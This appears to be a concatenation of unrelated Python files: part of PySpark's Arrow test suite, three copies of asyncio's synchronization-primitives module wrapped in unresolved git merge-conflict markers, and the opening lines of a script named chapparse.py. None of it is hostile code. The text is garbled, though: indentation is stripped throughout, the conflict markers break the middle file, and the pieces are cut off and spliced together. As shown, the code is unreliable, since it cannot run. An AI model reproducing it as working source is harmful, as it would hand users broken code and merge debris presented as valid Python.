def delay_first_part(partition_index, iterator):
if partition_index == 0:
time.sleep(0.1)
return iterator
# Collects Arrow RecordBatches out of order in driver JVM then re-orders in Python
def run_test(num_records, num_parts, max_records, use_delay=False):
df = self.spark.range(num_records, numPartitions=num_parts).toDF("a")
if use_delay:
df = df.rdd.mapPartitionsWithIndex(delay_first_part).toDF()
with self.sql_conf({"spark.sql.execution.arrow.maxRecordsPerBatch": max_records}):
pdf, pdf_arrow = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf, pdf_arrow)
cases = [
(1024, 512, 2), # Use large num partitions for more likely collecting out of order
(64, 8, 2, True), # Use delay in first partition to force collecting out of order
(64, 64, 1), # Test single batch per partition
(64, 1, 64), # Test single partition, single batch
(64, 1, 8), # Test single partition, multiple batches
(30, 7, 2), # Test different sized partitions
]
for case in cases:
run_test(*case)
def test_createDateFrame_with_category_type(self):
pdf = pd.DataFrame({"A": [u"a", u"b", u"c", u"a"]})
pdf["B"] = pdf["A"].astype('category')
category_first_element = dict(enumerate(pdf['B'].cat.categories))[0]
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": True}):
arrow_df = self.spark.createDataFrame(pdf)
arrow_type = arrow_df.dtypes[1][1]
result_arrow = arrow_df.toPandas()
arrow_first_category_element = result_arrow["B"][0]
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf)
spark_type = df.dtypes[1][1]
result_spark = df.toPandas()
spark_first_category_element = result_spark["B"][0]
assert_frame_equal(result_spark, result_arrow)
# ensure original category elements are string
self.assertIsInstance(category_first_element, str)
# spark data frame and arrow execution mode enabled data frame type must match pandas
self.assertEqual(spark_type, 'string')
self.assertEqual(arrow_type, 'string')
self.assertIsInstance(arrow_first_category_element, str)
self.assertIsInstance(spark_first_category_element, str)
def test_createDataFrame_with_float_index(self):
# SPARK-32098: float index should not produce duplicated or truncated Spark DataFrame
self.assertEqual(
self.spark.createDataFrame(
pd.DataFrame({'a': [1, 2, 3]}, index=[2., 3., 4.])).distinct().count(), 3)
def test_no_partition_toPandas(self):
# SPARK-32301: toPandas should work from a Spark DataFrame with no partitions
# Forward-ported from SPARK-32300.
pdf = self.spark.sparkContext.emptyRDD().toDF("col1 int").toPandas()
self.assertEqual(len(pdf), 0)
self.assertEqual(list(pdf.columns), ["col1"])
def test_createDataFrame_empty_partition(self):
pdf = pd.DataFrame({"c1": [1], "c2": ["string"]})
df = self.spark.createDataFrame(pdf)
self.assertEqual([Row(c1=1, c2='string')], df.collect())
self.assertGreater(self.spark.sparkContext.defaultParallelism, len(pdf))
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
class MaxResultArrowTests(unittest.TestCase):
# These tests are separate as 'spark.driver.maxResultSize' configuration
# is a static configuration to Spark context.
@classmethod
def setUpClass(cls):
cls.spark = SparkSession(SparkContext(
'local[4]', cls.__name__, conf=SparkConf().set("spark.driver.maxResultSize", "10k")))
# Explicitly enable Arrow and disable fallback.
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.enabled", "true")
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.fallback.enabled", "false")
@classmethod
def tearDownClass(cls):
if hasattr(cls, "spark"):
cls.spark.stop()
def test_exception_by_max_results(self):
with self.assertRaisesRegexp(Exception, "is bigger than"):
self.spark.range(0, 10000, 1, 100).toPandas()
class EncryptionArrowTests(ArrowTests):
@classmethod
def conf(cls):
return super(EncryptionArrowTests, cls).conf().set("spark.io.encryption.enabled", "true")
if __name__ == "__main__":
from pyspark.sql.tests.test_arrow import * # noqa: F401
try:
import xmlrunner # type: ignore
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
|
<<<<<<< HEAD
<<<<<<< HEAD
"""Synchronization primitives."""
__all__ = ['Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore']
import collections
from . import events
from . import futures
from .coroutines import coroutine
class _ContextManager:
"""Context manager.
This enables the following idiom for acquiring and releasing a
lock around a block:
with (yield from lock):
<block>
while failing loudly when accidentally using:
with lock:
<block>
"""
def __init__(self, lock):
self._lock = lock
def __enter__(self):
# We have no use for the "as ..." clause in the with
# statement for locks.
return None
def __exit__(self, *args):
try:
self._lock.release()
finally:
self._lock = None # Crudely prevent reuse.
class Lock:
"""Primitive lock objects.
A primitive lock is a synchronization primitive that is not owned
by a particular coroutine when locked. A primitive lock is in one
of two states, 'locked' or 'unlocked'.
It is created in the unlocked state. It has two basic methods,
acquire() and release(). When the state is unlocked, acquire()
changes the state to locked and returns immediately. When the
state is locked, acquire() blocks until a call to release() in
another coroutine changes it to unlocked, then the acquire() call
resets it to locked and returns. The release() method should only
be called in the locked state; it changes the state to unlocked
and returns immediately. If an attempt is made to release an
unlocked lock, a RuntimeError will be raised.
When more than one coroutine is blocked in acquire() waiting for
the state to turn to unlocked, only one coroutine proceeds when a
release() call resets the state to unlocked; first coroutine which
is blocked in acquire() is being processed.
acquire() is a coroutine and should be called with 'yield from'.
Locks also support the context management protocol. '(yield from lock)'
should be used as context manager expression.
Usage:
lock = Lock()
...
yield from lock
try:
...
finally:
lock.release()
Context manager usage:
lock = Lock()
...
with (yield from lock):
...
Lock objects can be tested for locking state:
if not lock.locked():
yield from lock
else:
# lock is acquired
...
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._locked = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self._locked else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Return True if lock is acquired."""
return self._locked
@coroutine
def acquire(self):
"""Acquire a lock.
This method blocks until the lock is unlocked, then sets it to
locked and returns True.
"""
if not self._waiters and not self._locked:
self._locked = True
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._locked = True
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a lock.
When the lock is locked, reset it to unlocked, and return.
If any other coroutines are blocked waiting for the lock to become
unlocked, allow exactly one of them to proceed.
When invoked on an unlocked lock, a RuntimeError is raised.
There is no return value.
"""
if self._locked:
self._locked = False
# Wake up the first waiter who isn't cancelled.
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
break
else:
raise RuntimeError('Lock is not acquired.')
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
# This must exist because __enter__ exists, even though that
# always raises; that's how the with-statement works.
pass
def __iter__(self):
# This is not a coroutine. It is meant to enable the idiom:
#
# with (yield from lock):
# <block>
#
# as an alternative to:
#
# yield from lock.acquire()
# try:
# <block>
# finally:
# lock.release()
yield from self.acquire()
return _ContextManager(self)
class Event:
"""Asynchronous equivalent to threading.Event.
Class implementing event objects. An event manages a flag that can be set
to true with the set() method and reset to false with the clear() method.
The wait() method blocks until the flag is true. The flag is initially
false.
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._value = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'set' if self._value else 'unset'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def is_set(self):
"""Return True if and only if the internal flag is true."""
return self._value
def set(self):
"""Set the internal flag to true. All coroutines waiting for it to
become true are awakened. Coroutine that call wait() once the flag is
true will not block at all.
"""
if not self._value:
self._value = True
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
def clear(self):
"""Reset the internal flag to false. Subsequently, coroutines calling
wait() will block until set() is called to set the internal flag
to true again."""
self._value = False
@coroutine
def wait(self):
"""Block until the internal flag is true.
If the internal flag is true on entry, return True
immediately. Otherwise, block until another coroutine calls
set() to set the flag to true, then return True.
"""
if self._value:
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
class Condition:
"""Asynchronous equivalent to threading.Condition.
This class implements condition variable objects. A condition variable
allows one or more coroutines to wait until they are notified by another
coroutine.
A new Lock object is created and used as the underlying lock.
"""
def __init__(self, lock=None, *, loop=None):
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
if lock is None:
lock = Lock(loop=self._loop)
elif lock._loop is not self._loop:
raise ValueError("loop argument must agree with lock")
self._lock = lock
# Export the lock's locked(), acquire() and release() methods.
self.locked = lock.locked
self.acquire = lock.acquire
self.release = lock.release
self._waiters = collections.deque()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
@coroutine
def wait(self):
"""Wait until notified.
If the calling coroutine has not acquired the lock when this
method is called, a RuntimeError is raised.
This method releases the underlying lock, and then blocks
until it is awakened by a notify() or notify_all() call for
the same condition variable in another coroutine. Once
awakened, it re-acquires the lock and returns True.
"""
if not self.locked():
raise RuntimeError('cannot wait on un-acquired lock')
self.release()
try:
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
finally:
yield from self.acquire()
@coroutine
def wait_for(self, predicate):
"""Wait until a predicate becomes true.
The predicate should be a callable which result will be
interpreted as a boolean value. The final predicate value is
the return value.
"""
result = predicate()
while not result:
yield from self.wait()
result = predicate()
return result
def notify(self, n=1):
"""By default, wake up one coroutine waiting on this condition, if any.
If the calling coroutine has not acquired the lock when this method
is called, a RuntimeError is raised.
This method wakes up at most n of the coroutines waiting for the
condition variable; it is a no-op if no coroutines are waiting.
Note: an awakened coroutine does not actually return from its
wait() call until it can reacquire the lock. Since notify() does
not release the lock, its caller should.
"""
if not self.locked():
raise RuntimeError('cannot notify on un-acquired lock')
idx = 0
for fut in self._waiters:
if idx >= n:
break
if not fut.done():
idx += 1
fut.set_result(False)
def notify_all(self):
"""Wake up all threads waiting on this condition. This method acts
like notify(), but wakes up all waiting threads instead of one. If the
calling thread has not acquired the lock when this method is called,
a RuntimeError is raised.
"""
self.notify(len(self._waiters))
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class Semaphore:
"""A Semaphore implementation.
A semaphore manages an internal counter which is decremented by each
acquire() call and incremented by each release() call. The counter
can never go below zero; when acquire() finds that it is zero, it blocks,
waiting until some other thread calls release().
Semaphores also support the context management protocol.
The optional argument gives the initial value for the internal
counter; it defaults to 1. If the value given is less than 0,
ValueError is raised.
"""
def __init__(self, value=1, *, loop=None):
if value < 0:
raise ValueError("Semaphore initial value must be >= 0")
self._value = value
self._waiters = collections.deque()
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked,value:{}'.format(
self._value)
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Returns True if semaphore can not be acquired immediately."""
return self._value == 0
@coroutine
def acquire(self):
"""Acquire a semaphore.
If the internal counter is larger than zero on entry,
decrement it by one and return True immediately. If it is
zero on entry, block, waiting until some other coroutine has
called release() to make it larger than 0, and then return
True.
"""
if not self._waiters and self._value > 0:
self._value -= 1
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._value -= 1
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a semaphore, incrementing the internal counter by one.
When it was zero on entry and another coroutine is waiting for it to
become larger than zero again, wake up that coroutine.
"""
self._value += 1
for waiter in self._waiters:
if not waiter.done():
waiter.set_result(True)
break
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class BoundedSemaphore(Semaphore):
"""A bounded semaphore implementation.
This raises ValueError in release() if it would increase the value
above the initial value.
"""
def __init__(self, value=1, *, loop=None):
self._bound_value = value
super().__init__(value, loop=loop)
def release(self):
if self._value >= self._bound_value:
raise ValueError('BoundedSemaphore released too many times')
super().release()
=======
"""Synchronization primitives."""
__all__ = ['Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore']
import collections
from . import events
from . import futures
from .coroutines import coroutine
class _ContextManager:
"""Context manager.
This enables the following idiom for acquiring and releasing a
lock around a block:
with (yield from lock):
<block>
while failing loudly when accidentally using:
with lock:
<block>
"""
def __init__(self, lock):
self._lock = lock
def __enter__(self):
# We have no use for the "as ..." clause in the with
# statement for locks.
return None
def __exit__(self, *args):
try:
self._lock.release()
finally:
self._lock = None # Crudely prevent reuse.
class Lock:
"""Primitive lock objects.
A primitive lock is a synchronization primitive that is not owned
by a particular coroutine when locked. A primitive lock is in one
of two states, 'locked' or 'unlocked'.
It is created in the unlocked state. It has two basic methods,
acquire() and release(). When the state is unlocked, acquire()
changes the state to locked and returns immediately. When the
state is locked, acquire() blocks until a call to release() in
another coroutine changes it to unlocked, then the acquire() call
resets it to locked and returns. The release() method should only
be called in the locked state; it changes the state to unlocked
and returns immediately. If an attempt is made to release an
unlocked lock, a RuntimeError will be raised.
When more than one coroutine is blocked in acquire() waiting for
the state to turn to unlocked, only one coroutine proceeds when a
release() call resets the state to unlocked; first coroutine which
is blocked in acquire() is being processed.
acquire() is a coroutine and should be called with 'yield from'.
Locks also support the context management protocol. '(yield from lock)'
should be used as context manager expression.
Usage:
lock = Lock()
...
yield from lock
try:
...
finally:
lock.release()
Context manager usage:
lock = Lock()
...
with (yield from lock):
...
Lock objects can be tested for locking state:
if not lock.locked():
yield from lock
else:
# lock is acquired
...
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._locked = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self._locked else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Return True if lock is acquired."""
return self._locked
@coroutine
def acquire(self):
"""Acquire a lock.
This method blocks until the lock is unlocked, then sets it to
locked and returns True.
"""
if not self._waiters and not self._locked:
self._locked = True
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._locked = True
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a lock.
When the lock is locked, reset it to unlocked, and return.
If any other coroutines are blocked waiting for the lock to become
unlocked, allow exactly one of them to proceed.
When invoked on an unlocked lock, a RuntimeError is raised.
There is no return value.
"""
if self._locked:
self._locked = False
# Wake up the first waiter who isn't cancelled.
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
break
else:
raise RuntimeError('Lock is not acquired.')
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
# This must exist because __enter__ exists, even though that
# always raises; that's how the with-statement works.
pass
def __iter__(self):
# This is not a coroutine. It is meant to enable the idiom:
#
# with (yield from lock):
# <block>
#
# as an alternative to:
#
# yield from lock.acquire()
# try:
# <block>
# finally:
# lock.release()
yield from self.acquire()
return _ContextManager(self)
class Event:
"""Asynchronous equivalent to threading.Event.
Class implementing event objects. An event manages a flag that can be set
to true with the set() method and reset to false with the clear() method.
The wait() method blocks until the flag is true. The flag is initially
false.
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._value = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'set' if self._value else 'unset'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def is_set(self):
"""Return True if and only if the internal flag is true."""
return self._value
def set(self):
"""Set the internal flag to true. All coroutines waiting for it to
become true are awakened. Coroutine that call wait() once the flag is
true will not block at all.
"""
if not self._value:
self._value = True
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
def clear(self):
"""Reset the internal flag to false. Subsequently, coroutines calling
wait() will block until set() is called to set the internal flag
to true again."""
self._value = False
@coroutine
def wait(self):
"""Block until the internal flag is true.
If the internal flag is true on entry, return True
immediately. Otherwise, block until another coroutine calls
set() to set the flag to true, then return True.
"""
if self._value:
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
class Condition:
"""Asynchronous equivalent to threading.Condition.
This class implements condition variable objects. A condition variable
allows one or more coroutines to wait until they are notified by another
coroutine.
A new Lock object is created and used as the underlying lock.
"""
def __init__(self, lock=None, *, loop=None):
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
if lock is None:
lock = Lock(loop=self._loop)
elif lock._loop is not self._loop:
raise ValueError("loop argument must agree with lock")
self._lock = lock
# Export the lock's locked(), acquire() and release() methods.
self.locked = lock.locked
self.acquire = lock.acquire
self.release = lock.release
self._waiters = collections.deque()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
@coroutine
def wait(self):
"""Wait until notified.
If the calling coroutine has not acquired the lock when this
method is called, a RuntimeError is raised.
This method releases the underlying lock, and then blocks
until it is awakened by a notify() or notify_all() call for
the same condition variable in another coroutine. Once
awakened, it re-acquires the lock and returns True.
"""
if not self.locked():
raise RuntimeError('cannot wait on un-acquired lock')
self.release()
try:
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
finally:
yield from self.acquire()
@coroutine
def wait_for(self, predicate):
"""Wait until a predicate becomes true.
The predicate should be a callable which result will be
interpreted as a boolean value. The final predicate value is
the return value.
"""
result = predicate()
while not result:
yield from self.wait()
result = predicate()
return result
def notify(self, n=1):
"""By default, wake up one coroutine waiting on this condition, if any.
If the calling coroutine has not acquired the lock when this method
is called, a RuntimeError is raised.
This method wakes up at most n of the coroutines waiting for the
condition variable; it is a no-op if no coroutines are waiting.
Note: an awakened coroutine does not actually return from its
wait() call until it can reacquire the lock. Since notify() does
not release the lock, its caller should.
"""
if not self.locked():
raise RuntimeError('cannot notify on un-acquired lock')
idx = 0
for fut in self._waiters:
if idx >= n:
break
if not fut.done():
idx += 1
fut.set_result(False)
def notify_all(self):
"""Wake up all threads waiting on this condition. This method acts
like notify(), but wakes up all waiting threads instead of one. If the
calling thread has not acquired the lock when this method is called,
a RuntimeError is raised.
"""
self.notify(len(self._waiters))
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class Semaphore:
"""A Semaphore implementation.
A semaphore manages an internal counter which is decremented by each
acquire() call and incremented by each release() call. The counter
can never go below zero; when acquire() finds that it is zero, it blocks,
waiting until some other thread calls release().
Semaphores also support the context management protocol.
The optional argument gives the initial value for the internal
counter; it defaults to 1. If the value given is less than 0,
ValueError is raised.
"""
def __init__(self, value=1, *, loop=None):
if value < 0:
raise ValueError("Semaphore initial value must be >= 0")
self._value = value
self._waiters = collections.deque()
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked,value:{}'.format(
self._value)
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Returns True if semaphore can not be acquired immediately."""
return self._value == 0
@coroutine
def acquire(self):
"""Acquire a semaphore.
If the internal counter is larger than zero on entry,
decrement it by one and return True immediately. If it is
zero on entry, block, waiting until some other coroutine has
called release() to make it larger than 0, and then return
True.
"""
if not self._waiters and self._value > 0:
self._value -= 1
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._value -= 1
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a semaphore, incrementing the internal counter by one.
When it was zero on entry and another coroutine is waiting for it to
become larger than zero again, wake up that coroutine.
"""
self._value += 1
for waiter in self._waiters:
if not waiter.done():
waiter.set_result(True)
break
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class BoundedSemaphore(Semaphore):
"""A bounded semaphore implementation.
This raises ValueError in release() if it would increase the value
above the initial value.
"""
def __init__(self, value=1, *, loop=None):
self._bound_value = value
super().__init__(value, loop=loop)
def release(self):
if self._value >= self._bound_value:
raise ValueError('BoundedSemaphore released too many times')
super().release()
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
"""Synchronization primitives."""
__all__ = ['Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore']
import collections
from . import events
from . import futures
from .coroutines import coroutine
class _ContextManager:
"""Context manager.
This enables the following idiom for acquiring and releasing a
lock around a block:
with (yield from lock):
<block>
while failing loudly when accidentally using:
with lock:
<block>
"""
def __init__(self, lock):
self._lock = lock
def __enter__(self):
# We have no use for the "as ..." clause in the with
# statement for locks.
return None
def __exit__(self, *args):
try:
self._lock.release()
finally:
self._lock = None # Crudely prevent reuse.
class Lock:
"""Primitive lock objects.
A primitive lock is a synchronization primitive that is not owned
by a particular coroutine when locked. A primitive lock is in one
of two states, 'locked' or 'unlocked'.
It is created in the unlocked state. It has two basic methods,
acquire() and release(). When the state is unlocked, acquire()
changes the state to locked and returns immediately. When the
state is locked, acquire() blocks until a call to release() in
another coroutine changes it to unlocked, then the acquire() call
resets it to locked and returns. The release() method should only
be called in the locked state; it changes the state to unlocked
and returns immediately. If an attempt is made to release an
unlocked lock, a RuntimeError will be raised.
When more than one coroutine is blocked in acquire() waiting for
the state to turn to unlocked, only one coroutine proceeds when a
release() call resets the state to unlocked; first coroutine which
is blocked in acquire() is being processed.
acquire() is a coroutine and should be called with 'yield from'.
Locks also support the context management protocol. '(yield from lock)'
should be used as context manager expression.
Usage:
lock = Lock()
...
yield from lock
try:
...
finally:
lock.release()
Context manager usage:
lock = Lock()
...
with (yield from lock):
...
Lock objects can be tested for locking state:
if not lock.locked():
yield from lock
else:
# lock is acquired
...
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._locked = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self._locked else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Return True if lock is acquired."""
return self._locked
@coroutine
def acquire(self):
"""Acquire a lock.
This method blocks until the lock is unlocked, then sets it to
locked and returns True.
"""
if not self._waiters and not self._locked:
self._locked = True
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._locked = True
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a lock.
When the lock is locked, reset it to unlocked, and return.
If any other coroutines are blocked waiting for the lock to become
unlocked, allow exactly one of them to proceed.
When invoked on an unlocked lock, a RuntimeError is raised.
There is no return value.
"""
if self._locked:
self._locked = False
# Wake up the first waiter who isn't cancelled.
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
break
else:
raise RuntimeError('Lock is not acquired.')
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
# This must exist because __enter__ exists, even though that
# always raises; that's how the with-statement works.
pass
def __iter__(self):
# This is not a coroutine. It is meant to enable the idiom:
#
# with (yield from lock):
# <block>
#
# as an alternative to:
#
# yield from lock.acquire()
# try:
# <block>
# finally:
# lock.release()
yield from self.acquire()
return _ContextManager(self)
class Event:
"""Asynchronous equivalent to threading.Event.
Class implementing event objects. An event manages a flag that can be set
to true with the set() method and reset to false with the clear() method.
The wait() method blocks until the flag is true. The flag is initially
false.
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._value = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'set' if self._value else 'unset'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def is_set(self):
"""Return True if and only if the internal flag is true."""
return self._value
def set(self):
"""Set the internal flag to true. All coroutines waiting for it to
become true are awakened. Coroutine that call wait() once the flag is
true will not block at all.
"""
if not self._value:
self._value = True
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
def clear(self):
"""Reset the internal flag to false. Subsequently, coroutines calling
wait() will block until set() is called to set the internal flag
to true again."""
self._value = False
@coroutine
def wait(self):
"""Block until the internal flag is true.
If the internal flag is true on entry, return True
immediately. Otherwise, block until another coroutine calls
set() to set the flag to true, then return True.
"""
if self._value:
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
class Condition:
"""Asynchronous equivalent to threading.Condition.
This class implements condition variable objects. A condition variable
allows one or more coroutines to wait until they are notified by another
coroutine.
A new Lock object is created and used as the underlying lock.
"""
def __init__(self, lock=None, *, loop=None):
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
if lock is None:
lock = Lock(loop=self._loop)
elif lock._loop is not self._loop:
raise ValueError("loop argument must agree with lock")
self._lock = lock
# Export the lock's locked(), acquire() and release() methods.
self.locked = lock.locked
self.acquire = lock.acquire
self.release = lock.release
self._waiters = collections.deque()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
@coroutine
def wait(self):
"""Wait until notified.
If the calling coroutine has not acquired the lock when this
method is called, a RuntimeError is raised.
This method releases the underlying lock, and then blocks
until it is awakened by a notify() or notify_all() call for
the same condition variable in another coroutine. Once
awakened, it re-acquires the lock and returns True.
"""
if not self.locked():
raise RuntimeError('cannot wait on un-acquired lock')
self.release()
try:
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
finally:
yield from self.acquire()
@coroutine
def wait_for(self, predicate):
"""Wait until a predicate becomes true.
The predicate should be a callable which result will be
interpreted as a boolean value. The final predicate value is
the return value.
"""
result = predicate()
while not result:
yield from self.wait()
result = predicate()
return result
def notify(self, n=1):
"""By default, wake up one coroutine waiting on this condition, if any.
If the calling coroutine has not acquired the lock when this method
is called, a RuntimeError is raised.
This method wakes up at most n of the coroutines waiting for the
condition variable; it is a no-op if no coroutines are waiting.
Note: an awakened coroutine does not actually return from its
wait() call until it can reacquire the lock. Since notify() does
not release the lock, its caller should.
"""
if not self.locked():
raise RuntimeError('cannot notify on un-acquired lock')
idx = 0
for fut in self._waiters:
if idx >= n:
break
if not fut.done():
idx += 1
fut.set_result(False)
def notify_all(self):
"""Wake up all threads waiting on this condition. This method acts
like notify(), but wakes up all waiting threads instead of one. If the
calling thread has not acquired the lock when this method is called,
a RuntimeError is raised.
"""
self.notify(len(self._waiters))
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class Semaphore:
"""A Semaphore implementation.
A semaphore manages an internal counter which is decremented by each
acquire() call and incremented by each release() call. The counter
can never go below zero; when acquire() finds that it is zero, it blocks,
waiting until some other thread calls release().
Semaphores also support the context management protocol.
The optional argument gives the initial value for the internal
counter; it defaults to 1. If the value given is less than 0,
ValueError is raised.
"""
def __init__(self, value=1, *, loop=None):
if value < 0:
raise ValueError("Semaphore initial value must be >= 0")
self._value = value
self._waiters = collections.deque()
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked,value:{}'.format(
self._value)
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Returns True if semaphore can not be acquired immediately."""
return self._value == 0
@coroutine
def acquire(self):
"""Acquire a semaphore.
If the internal counter is larger than zero on entry,
decrement it by one and return True immediately. If it is
zero on entry, block, waiting until some other coroutine has
called release() to make it larger than 0, and then return
True.
"""
if not self._waiters and self._value > 0:
self._value -= 1
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._value -= 1
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a semaphore, incrementing the internal counter by one.
When it was zero on entry and another coroutine is waiting for it to
become larger than zero again, wake up that coroutine.
"""
self._value += 1
for waiter in self._waiters:
if not waiter.done():
waiter.set_result(True)
break
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class BoundedSemaphore(Semaphore):
"""A bounded semaphore implementation.
This raises ValueError in release() if it would increase the value
above the initial value.
"""
def __init__(self, value=1, *, loop=None):
self._bound_value = value
super().__init__(value, loop=loop)
def release(self):
if self._value >= self._bound_value:
raise ValueError('BoundedSemaphore released too many times')
super().release()
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
|
|
#!/usr/bin/env python
# chapparse.py
import sys, re, getopt, os
from string import Template
name = 'chapparse.py'
version = '0.4'
rat = re.compile('(\d+)(?:/|:)(\d+)')
